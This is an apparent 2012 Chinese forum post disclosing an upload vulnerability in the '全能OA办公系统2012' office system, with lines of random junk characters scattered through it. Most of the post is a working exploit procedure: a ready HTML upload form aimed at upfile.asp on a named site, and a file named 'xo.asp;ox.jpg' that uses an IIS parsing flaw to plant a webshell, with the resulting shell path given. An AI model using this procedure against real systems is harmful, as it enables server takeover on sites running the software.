全能OA办公系统 上传漏洞
1 M8 I, L1 H9 g: p* ^/ s1 @9 C2 L$ v7 v6 g- [4 R# j; ~
系统介绍:
' E- n& K: ^* B$ a! E
( t' N/ D- Y6 \9 z( [- {全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。3 ?3 K0 ]# t/ _& ^& }
( w" ^0 x& g! G
主要功能:
- K$ ]; ^- h- B8 C, k公司通告
$ `: j' H- t% z$ V: {$ S工作计划
" C. q0 s( P# | v: R: f通讯助理 5 R& E+ o* }7 Q- p. t
客户资源
% O" z6 l) Z z% g. @( _3 l- O6 Y我的公文 # z0 I! e5 j+ W5 {1 u) ?1 A$ m# E
公文传阅 $ t& m3 t+ T/ J0 p$ j! Z& Q+ V
公共资源
9 n3 Z4 l% E- {5 W资源预约
5 Y4 C0 N/ I0 y今日考勤
& P& W) N7 G0 {3 X/ S' G1 k7 `个人计划
" d7 P( @& o$ ?( @/ j2 X4 X个人通讯录 5 R* @4 C5 W. r7 {3 F2 a
个人基本档案
+ l9 |" n7 @/ h未读邮件
, K2 A+ u o5 p& Q9 M9 | c发邮件
9 C$ r# b a, m6 N收件夹 : }* I: @' ~9 O4 F3 H, Q( S5 e
寄件夹
1 v) Y+ k M& t/ O$ u网络硬盘 8 f3 x/ L* F+ F3 l; ^( [# ~6 p
网络会议
: s4 p9 |8 v6 E) D2 L: [* K网络调查 ; O; W. v+ `8 Z- X( } R- {
交流论坛
* E, w6 v: n! G3 H7 |
( X9 ]6 C2 o- G; `! Y有兴趣测试的朋友可以下源码看看
( {9 D) f T( U7 {. {, T6 L: H
* o* D! M8 B q: j" Y, L8 Q2 L源码下载:
$ W5 H3 |* S n' y+ ?2 C u1 Z8 T: k! d
http://www.mycodes.net/30/4750.htm
& ~! |' ]; B1 {0 I- U! @
( V" E& n$ A0 g漏洞介绍:
( Q+ Y7 v1 [* G, O, U$ S8 o H: S. {# O1 J0 g
由upfile.asp上传文件漏洞引起6 j8 Y- C7 P. w) y% f% b6 o; T
4 C9 v7 p1 I H6 k: Q2 f
测试方法:
! d% g8 Z% W% T2 g K- q2 x( o3 B8 ^8 J! ^" Q
使用名小子上传http://www.itlynn.com/upfile.asp即可
' d9 ]; O, d3 w' i6 K {7 @- r/ K1 \' k
如果upfile.asp文件被删除不存在。2 F. p5 s" r" Y: }7 n) q
! T7 i- \% V' K# p! ^ Z
那么可以试着访问http://www.itlynn.com/upfile/upfile.asp 。
: }. _& z7 Z$ ]
4 Q5 o @* F! G* C如果存在那么将如下代码保存为upfile.html。
2 K1 B* P% f2 Q' R( }' _) {/ ?& g I7 }5 `9 J* u
然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp。
, c2 D7 I. C( k1 S
5 E% p: K3 `, G% j. o I7 Y6 g $ G7 d6 L- l" B
: X. B; t! a4 f/ m5 q( j0 b
01 <table border='0' align="center" cellpadding="5"> . A5 A1 i* {9 T$ v( d$ Q" a, w
8 T/ Y1 Z; f3 o) q! }
02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1">
1 n* u$ d+ h2 N! e, \ `: d* [+ u8 a0 i& g0 v7 n# f
03 <tr> + c8 P+ ]5 U2 i" g2 S9 n
' K9 U0 ~ {- Y3 d5 o- S: A04 <td>报错:</td>
$ k# F9 P7 }% [$ f" y; \" D8 H! r$ T( C# @- o* g& A1 }
05 <td><input type='radio' name='errnumber' value='0'>
0 e) s$ z9 w* e! {% L& Q6 P: A6 S( P- @; ?4 [2 k: V. _+ T
06 自动更名
1 I/ H* T. ?* z: Q. _$ V1 s; A
% Y/ ~- A8 S9 K) ^% N/ M07 <input type='radio' name='errnumber' value='1' checked> * \6 b1 E% I$ `1 u: w1 ?4 v( f& U
: ~' R2 g. ?/ {3 C! `% r; O! O
08 报错方式
. Q6 g& {4 t/ p( \! ]' j
0 V: |2 b2 { N0 ~0 x2 p6 `0 t! t09 <input type='radio' name='errnumber' value='2'> # D! Q6 }+ T0 |$ B* a" G
& H' j! R" a# q8 D
10 直接覆盖</td> . K( t6 I: \6 K+ o" H+ H* y
; f% l* T X1 X ~1 h" y) m
11 </tr> & Y; ^7 K2 l3 m/ o4 n4 l
# u8 g( ~" i& M1 X4 \12 <tr>
* k! H- Y- X/ a1 B' @* O; @# a" F8 j- _
13 <td>主题:</td>
& v1 z# ^* P' Q* W9 w% r
5 ~% h4 L6 }* Z0 p* t. @! o6 Q14 <td><input type='text' name='filename' size='30'></td>
8 V0 Q- t2 _0 o' H
. M( {9 x4 K4 A4 \6 a$ ]1 U15 </tr> & D( O7 Y/ I1 X3 H: {( V
5 i- [( J6 q4 R2 O- e1 _: x% d16 <tr>
8 I7 m$ N: e" e A9 v
0 m! p7 B! o6 s4 ~17 <td>文件:</td>
9 I, W4 c& v3 G- w1 G: i1 c( A# P; j# t. T' h! C( a# i
18 <td><input type="file"name="fruit"size="30"></td>
/ L: @) H( S+ N0 q8 b
( ~; n+ h( {2 E; f1 h19 </tr>
) F. C8 h- F \- `, o m0 \$ D+ J4 Z: r9 X6 j1 E
20 <tr>
- n1 Z5 d9 C b7 p# J8 V
2 {$ [0 r" J* j+ Y21 <td valign='top'>简介:</td> 0 ?% J s y/ y! q% E V: v3 G, ~
9 I! G$ V* H( @7 s6 b, T
22 <td><textarea name='fileExt' cols='40' rows='5'></textarea></td> + E4 R/ d0 ?: P o6 q
. h( }4 O5 _$ |8 \1 |2 u3 u& b
23 </tr> 7 a; Z5 c- y( ^5 ^+ w' O
* U+ {5 J( B# A- A24
+ ` Y V0 c5 `, h& y# Z, X, j6 q
25 <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td>
7 i! o3 P+ P" s) p7 R
9 } \4 w6 \& }: ~6 y! v6 z26 </tr> P0 b+ I; {! g) R7 o4 \, c' L
; o- z2 h3 g* a q
27 </form>
) d; r# ]$ ~9 f5 f
' [7 C" `/ z& B1 A然后打开上传一个文件名为xo.asp;ox.jpg的文件。) G2 M( u+ d$ e$ v" @; z' i
! M7 [' _$ s* Q
8 A' P" ~' [/ Z' O* Y
: z' f' H9 H3 H上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg
' u; R! v- }! c) e: y6 ~1 n \8 |0 ?/ S
此漏洞需要配合解析漏洞利用。
3 P" d! f# j8 G3 |. h- ^8 v; `4 N
( @6 N6 y9 j' A |
发表于 2012-11-21 13:45:12
收藏
支持
反对